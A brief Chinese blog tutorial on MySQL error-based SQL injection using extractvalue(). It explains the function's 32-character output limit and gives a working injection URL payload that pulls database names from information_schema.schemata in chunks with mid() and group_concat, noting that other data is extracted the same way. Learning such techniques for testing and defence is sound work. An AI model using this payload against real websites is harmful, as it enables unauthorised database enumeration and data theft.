MySQL报错注入

2020-11-09  本文已影响0人  好好睡觉鸭

extractvalue(),最多显示32位

在[code]处插入语句


数据库名

因为限制了显示位数,所以未完全显示出所有数据库,使用截断,

http://url/?id=1 and (extractvalue(1,concat(0x7e,(select mid(group_concat(schema_name),32)+from+information_schema.schemata),0x7e)))--+

数据库名2

直到将所有数据库名全部显示,其他数据注入基本大致相同,如下。

上一篇 下一篇

猜你喜欢

热点阅读